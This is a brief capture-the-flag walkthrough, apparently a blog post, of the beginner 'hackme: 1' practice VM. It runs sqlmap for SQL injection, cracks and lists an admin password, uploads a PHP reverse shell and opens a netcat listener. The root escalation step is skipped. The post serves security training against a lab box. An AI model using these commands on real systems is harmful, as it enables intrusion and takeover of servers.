Hello dear friends, welcome back for another CTF Walkthrough. Today we will solve hackme: 1machine.
‘hackme’ is a beginner difficulty level box. The goal is to gain limited privilege access via web vulnerabilities and subsequently, privilege escalate as root. The lab was created to mimic the real-life environment.
‘hackme’ uses DHCP and in the possible event that the MySQL shuts down on its own (very rare cases), attempt to force restart the machine and it should be working fine subsequently. This may work better in VirtualBox than VMware
The first thing is to explore the web app and create a new user.
Click on sign up and create a new user
After that login into the web app
sqlmap -r request.req
Bingo the web app is vulnerable !!!
Crack the password
I used this web site to crack the admin password link. Fantastic now we have the admin password
- superadmin : Uncrackable
After that, we had logged in to the admin page we can upload a web shell
- cp /usr/share/webshells/php/php-reverse-shell.php .
- modify the web shell with our local IP
Open a new command line and use Netcat in the listening mode:
- nc -nlvp 443
Upload The web shell
Then go to /uploads and click on our webshell
Fantastic we got a revshell
The final step is to escalate our privilege.
- cd /home/legacy
Fantastic we are root and we have completed the hackme: 1 machine